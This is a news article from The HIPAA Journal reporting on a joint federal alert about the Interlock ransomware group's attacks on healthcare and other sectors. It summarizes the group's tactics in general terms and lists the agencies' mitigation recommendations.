The U.S. Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), Department of Health and Human Services (HHS), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) have issued a joint alert about the Interlock ransomware group, which has accelerated attacks on businesses and critical infrastructure organizations. The alert shares the latest tactics, techniques, and procedures (TTPs) and indicators of compromise (IoCs) collected from investigations of the group’s ransomware attacks in June 2025.
Interlock is a ransomware-as-a-service operation that first emerged in September 2024. The group has attacked entities in multiple sectors but appears to favor organizations in the healthcare and public health (HPH) sector. Healthcare victims include the kidney dialysis giant DaVita, Texas Tech University Health Sciences Center, Kettering Health, Drug and Alcohol Treatment Services, Brockton Neighborhood Health Center, and Naper Grove Vision Care.
Interlock is a financially motivated cybercriminal group that uses ransomware in its attacks on Windows and Linux systems, favoring attacks in North America and Europe. The group engages in double extortion tactics, breaching networks, stealing data, and demanding payment to decrypt files and prevent the publication of the stolen data on its dark web data leak site. The group’s TTPs are constantly evolving, and several new techniques have been observed in recent weeks.
One relatively unusual technique for a ransomware group is the use of compromised legitimate websites for drive-by downloads, disguising the payload as an installer for Google Chrome, Microsoft Edge, and other popular software solutions. These attacks distribute a remote access trojan, which provides initial access. The RAT executes a PowerShell script, which establishes persistence by dropping a file into the Windows Startup Folder to ensure it runs each time the user logs in. Alternatively, a PowerShell command is used to make a run key value in the Windows Registry for persistence.
The group has also been observed using the ClickFix social engineering technique for initial access. This involves tricking individuals into executing a malicious payload by convincing them that doing so will fix a problem on their device – blocking spam emails, removing a fictitious malware infection, etc.
Once initial access has been gained, tools such as Interlock RAT and NodeSnake RAT are used for C2 communications and command execution. The group has been observed using PowerShell to download a credential stealer and keylogger to harvest credentials for lateral movement and privilege escalation. Azure Storage Explorer is used to access Azure storage accounts, AzCopy is used to upload data to the Azure storage blob, and file transfer tools such as WinSCP have also been used for data exfiltration.
The authoring agencies have made several recommendations to mitigate Interlock threat activity, which include the following:
- Implement a domain name filtering (DNS) solution to block access to malicious websites
- Implement a web access firewall
- Patch promptly and keep all software and operating systems up to date
- Train end users to spot social engineering and phishing attempts
- Segment networks to restrict lateral movement
- Implement robust identity, credential, and access policies
- Implement multifactor authentication on all accounts and services as far as possible, ideally phishing-resistant multi-factor authentication.
- Ensure backups are made of the entire organization’s data infrastructure, and that backup data is encrypted, immutable, and stored securely off-site
The post Feds Issue Interlock Ransomware Warning as Healthcare Attacks Spike appeared first on The HIPAA Journal.